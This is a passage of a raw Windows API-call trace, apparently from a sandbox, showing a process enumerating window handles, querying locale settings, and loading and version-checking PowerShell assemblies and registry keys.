GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x5a4 [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x610 [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x148 [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x4f8 [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.912] GetLastError () returned 0x514 [0026.912] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.912] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x201a4, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x201ae, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0xa7c [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8fc [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8ec [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8dc [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8cc [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8b8 [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8a8 [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x898 [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x888 [0026.913] GetLastError () returned 0x514 [0026.913] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x878 [0026.913] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x868 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x858 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x848 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x838 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x828 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x818 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x808 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x128 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x52c [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x510 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x420 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x424 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x740 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x150 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x5e0 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x630 [0026.914] GetLastError () returned 0x514 [0026.914] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x54c [0026.914] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x228 [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x294 [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x76c [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x404 [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x5a4 [0026.915] GetLastError () returned 0x514 [0026.915] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x148 [0026.915] GetLastError () returned 0x514 [0026.915] GetLastError () returned 0x514 [0026.917] WerSetFlags () returned 0x0 [0026.931] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0026.934] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24ebdc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24ebd8 | out: pulNumLanguages=0x24ebdc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24ebd8) returned 1 [0026.934] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24ebdc, pwszLanguagesBuffer=0x1fb0038, pcchLanguagesBuffer=0x24ebd8 | out: pulNumLanguages=0x24ebdc, pwszLanguagesBuffer=0x1fb0038, pcchLanguagesBuffer=0x24ebd8) returned 1 [0026.942] GetUserDefaultLocaleName (in: lpLocaleName=0xd2630, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0026.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.979] GetLastError () returned 0xcb [0026.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.983] GetLastError () returned 0xcb [0026.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.984] GetLastError () returned 0xcb [0026.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.994] GetLastError () returned 0xcb [0026.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.994] GetLastError () returned 0xcb [0026.994] SetErrorMode (uMode=0x1) returned 0x1 [0026.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24eae8 | out: lpFileInformation=0x24eae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0026.994] GetLastError () returned 0xcb [0026.994] SetErrorMode (uMode=0x1) returned 0x1 [0026.994] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24eb6c | out: lpdwHandle=0x24eb6c) returned 0x94c [0027.002] GetLastError () returned 0x0 [0027.002] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1fb2568 | out: lpData=0x1fb2568) returned 1 [0027.005] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24eb38, puLen=0x24eb34 | out: lplpBuffer=0x24eb38*=0x1fb2604, puLen=0x24eb34) returned 1 [0027.005] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb26e0, puLen=0x24eab0) returned 1 [0027.005] lstrlenW (lpString="Microsoft Corporation") returned 21 [0027.005] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0027.005] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb2734, puLen=0x24eab0) returned 1 [0027.005] lstrlenW (lpString="System.Management.Automation") returned 28 [0027.005] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0027.005] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb2790, puLen=0x24eab0) returned 1 [0027.005] lstrlenW (lpString="6.1.7601.17514") returned 14 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb27d0, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb2838, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb28d4, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb2938, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb29b4, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="6.1.7601.17514") returned 14 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0027.006] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x1fb265c, puLen=0x24eab0) returned 1 [0027.006] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0027.006] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0027.007] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x0, puLen=0x24eab0) returned 0 [0027.007] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x0, puLen=0x24eab0) returned 0 [0027.007] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24eab4, puLen=0x24eab0 | out: lplpBuffer=0x24eab4*=0x0, puLen=0x24eab0) returned 0 [0027.007] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24eaa8, puLen=0x24eaa4 | out: lplpBuffer=0x24eaa8*=0x1fb2604, puLen=0x24eaa4) returned 1 [0027.007] VerLanguageNameW (in: wLang=0x0, szLang=0xd2630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0027.007] VerQueryValueW (in: pBlock=0x1fb2568, lpSubBlock="\\", lplpBuffer=0x24eabc, puLen=0x24eab8 | out: lplpBuffer=0x24eabc*=0x1fb2590, puLen=0x24eab8) returned 1 [0027.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.014] GetLastError () returned 0xcb [0027.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.018] GetLastError () returned 0xcb [0027.021] lstrlenW (lpString="䅁") returned 1 [0027.023] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ea80 | out: phkResult=0x24ea80*=0x300) returned 0x0 [0027.023] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ea84 | out: phkResult=0x24ea84*=0x304) returned 0x0 [0027.023] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24eab8 | out: phkResult=0x24eab8*=0x308) returned 0x0 [0027.025] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24eaf8, lpData=0x0, lpcbData=0x24eaf4*=0x0 | out: lpType=0x24eaf8*=0x1, lpData=0x0, lpcbData=0x24eaf4*=0x56) returned 0x0 [0027.026] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24eaf8, lpData=0xd2630, lpcbData=0x24eaf4*=0x56 | out: lpType=0x24eaf8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24eaf4*=0x56) returned 0x0 [0027.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.030] GetLastError () returned 0x0 [0027.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.031] GetLastError () returned 0x0 [0027.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.036] GetLastError () returned 0x0 [0027.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.046] GetLastError () returned 0xcb [0027.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0027.245] GetLastError () returned 0x2 [0027.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0027.245] GetLastError () returned 0x2 [0027.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.317] GetLastError () returned 0xcb [0027.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.318] GetLastError () returned 0xcb [0027.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.338] GetLastError () returned 0xcb [0027.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.339] GetLastError () returned 0xcb [0027.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.339] GetLastError () returned 0xcb [0027.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0027.470] GetLastError () returned 0x0 [0027.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0027.470] GetLastError () returned 0x0 [0027.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.484] GetLastError () returned 0xcb [0027.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.486] GetLastError () returned 0xcb [0027.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.524] GetLastError () returned 0x7e [0027.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.524] GetLastError () returned 0x7e [0027.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0027.904] GetLastError () returned 0x2 [0027.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0027.904] GetLastError () returned 0x2 [0027.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0027.981] GetLastError () returned 0x57 [0027.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0027.982] GetLastError () returned 0x57 [0028.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0028.132] GetLastError () returned 0x2 [0028.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, 